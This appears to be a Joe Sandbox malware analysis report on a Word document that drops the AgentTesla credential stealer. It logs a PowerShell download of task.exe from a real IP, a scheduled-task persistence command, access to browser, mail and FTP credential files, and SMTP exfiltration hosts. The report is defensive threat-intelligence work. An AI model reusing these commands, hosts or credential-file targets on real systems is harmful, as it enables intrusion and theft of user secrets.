                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 14.0.task.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.33d4df8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.339ebd8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.task.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.339ebd8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.33d4df8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)Show sources
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Tries to harvest and steal ftp login credentialsShow sources
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\task.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: Yara matchFile source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 14.0.task.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.33d4df8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.339ebd8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.task.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.339ebd8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.task.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.task.exe.33d4df8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection211Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting3Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery1Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter13Network Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion131SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaScheduled Task/Job1Rc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesPowerShell3Startup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection211Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 528739 Sample: PAGO DEL SALDO.doc Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Sigma detected: Powershell download and execute file 2->57 59 19 other signatures 2->59 8 WINWORD.EXE 306 47 2->8         started        process3 dnsIp4 47 173.232.204.89, 49167, 49168, 80 EONIX-COMMUNICATIONS-ASBLOCK-62904US United States 8->47 39 C:\Users\user\AppData\Local\...\task[1].exe, PE32 8->39 dropped 41 C:\Users\user\AppData\...\abdtfhghgeghDp .ScT, data 8->41 dropped 43 C:\Users\user\AppData\Local\...\DD7EADD8.png, 370 8->43 dropped 69 Document exploit detected (creates forbidden files) 8->69 71 Suspicious powershell command line found 8->71 73 Tries to download and execute files (via powershell) 8->73 75 Microsoft Office creates scripting files 8->75 13 powershell.exe 12 7 8->13         started        17 notepad.exe 8->17         started        19 powershell.exe 7 8->19         started        21 2 other processes 8->21 file5 signatures6 process7 file8 45 C:\Users\user\AppData\Roaming\task.exe, PE32 13->45 dropped 85 Powershell drops PE file 13->85 23 task.exe 3 13->23         started        87 Injects files into Windows application 17->87 signatures9 process10 file11 35 C:\Users\user\AppData\Roaming\SzfukVRF.exe, PE32 23->35 dropped 37 C:\Users\user\AppData\Local\...\tmpBA6A.tmp, XML 23->37 dropped 61 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 23->61 63 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 23->63 65 Uses schtasks.exe or at.exe to add and modify task schedules 23->65 67 2 other signatures 23->67 27 task.exe 10 23->27         started        31 powershell.exe 6 23->31         started        33 schtasks.exe 23->33         started        signatures12 process13 dnsIp14 49 208.91.199.224, 49173, 587 PUBLIC-DOMAIN-REGISTRYUS United States 27->49 51 us2.smtp.mailhostbox.com 208.91.198.143, 49169, 49170, 49171 PUBLIC-DOMAIN-REGISTRYUS United States 27->51 77 Tries to steal Mail credentials (via file / registry access) 27->77 79 Tries to harvest and steal ftp login credentials 27->79 81 Tries to harvest and steal browser information (history, passwords, etc) 27->81 83 Installs a global keyboard hook 27->83 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    14.0.task.exe.400000.13.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.task.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.task.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                    14.0.task.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File
                    14.2.task.exe.400000.0.unpack100%AviraHEUR/AGEN.1143187Download File
                    14.0.task.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    httP://173.232.20%Avira URL Cloudsafe
                    httP://173.232.204.89/t0%Avira URL Cloudsafe
                    http://java.lp0%Avira URL Cloudsafe
                    http://173.232.204.890%Avira URL Cloudsafe
                    httP://173.232.204.89/task.exePE0%Avira URL Cloudsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    httP://173.2320%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    http://173.232.204.89/task.exe0%Avira URL Cloudsafe
                    httP://173.232.204.89/task.ex0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    208.91.198.143
                    truefalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://173.232.204.89/task.exetrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      httP://173.232.2powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      low
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmpfalse
                        high
                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmpfalse
                          high
                          httP://173.232.204.89/tpowershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://java.lppowershell.exe, 00000003.00000002.429782897.00000000001F9000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://173.232.204.89powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.438810509.0000000003839000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          httP://173.232.204.89/task.exePEpowershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmpfalse
                            high
                            http://www.%s.comPApowershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            low
                            httP://173.232powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            low
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametask.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmpfalse
                              high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziptask.exe, 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              httP://173.232.204.89/task.expowershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              httP://173.232.204.89/task.exepowershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.425635089.0000000002D8F000.00000004.00000001.sdmptrue
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                208.91.198.143
                                us2.smtp.mailhostbox.comUnited States
                                394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                208.91.199.224
                                unknownUnited States
                                394695PUBLIC-DOMAIN-REGISTRYUStrue
                                173.232.204.89
                                unknownUnited States
                                62904EONIX-COMMUNICATIONS-ASBLOCK-62904UStrue

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:528739
                                Start date:25.11.2021
                                Start time:18:20:30
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 10m 52s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:PAGO DEL SALDO.doc
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:18
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winDOC@21/27@8/3
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 93%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .doc
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                • TCP Packets have been reduced to 100
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                18:21:21API Interceptor144x Sleep call for process: powershell.exe modified
                                18:21:29API Interceptor1177x Sleep call for process: task.exe modified
                                18:21:34API Interceptor1x Sleep call for process: schtasks.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                208.91.198.143MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                  Reconfirm The Details.docGet hashmaliciousBrowse
                                    Document.exeGet hashmaliciousBrowse
                                      MT_101_SWIFT.docGet hashmaliciousBrowse
                                        Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                          TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                            E invoice.exeGet hashmaliciousBrowse
                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                PNkBekAKOeQD1Jj.exeGet hashmaliciousBrowse
                                                  PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                    DHL Documentos de envio originales.exeGet hashmaliciousBrowse
                                                      XSsBxQH419.exeGet hashmaliciousBrowse
                                                        devis.xlsxGet hashmaliciousBrowse
                                                          Quotation- 306013SQ.exeGet hashmaliciousBrowse
                                                            PO 4601056018.exeGet hashmaliciousBrowse
                                                              Purchase Order Vale-60,000MT.exeGet hashmaliciousBrowse
                                                                BOQ 11745692.exeGet hashmaliciousBrowse
                                                                  dhl_doc9548255382.exeGet hashmaliciousBrowse
                                                                    ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                                      Quotation.xlsxGet hashmaliciousBrowse
                                                                        208.91.199.224MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                          Reconfirm The Details.docGet hashmaliciousBrowse
                                                                            Document.exeGet hashmaliciousBrowse
                                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                  DOC221121.exeGet hashmaliciousBrowse
                                                                                    TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                      AWB Number 0004318855.DOCX.exeGet hashmaliciousBrowse
                                                                                        Purchase Order.exeGet hashmaliciousBrowse
                                                                                          ORDER INQUIRY-PVP-SP-2021-56.exeGet hashmaliciousBrowse
                                                                                            PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                              vYeUxRnIbLKDudo.exeGet hashmaliciousBrowse
                                                                                                DHL Documentos de envio originales.exeGet hashmaliciousBrowse
                                                                                                  pVLzns64XtYkuFT.exeGet hashmaliciousBrowse
                                                                                                    BOQ 11745692.exeGet hashmaliciousBrowse
                                                                                                      BOQ 11745692.exeGet hashmaliciousBrowse
                                                                                                        ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                                                                          gHs6ECUllmPgK2I.exeGet hashmaliciousBrowse
                                                                                                            RFQ.exeGet hashmaliciousBrowse
                                                                                                              IMG-4579876545676545676543.exeGet hashmaliciousBrowse

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                us2.smtp.mailhostbox.comMT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Document.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.198.143
                                                                                                                MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                DOC221121.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                rTyPU1zmY5PsyNl.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.223
                                                                                                                DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.223
                                                                                                                Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.198.143
                                                                                                                STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
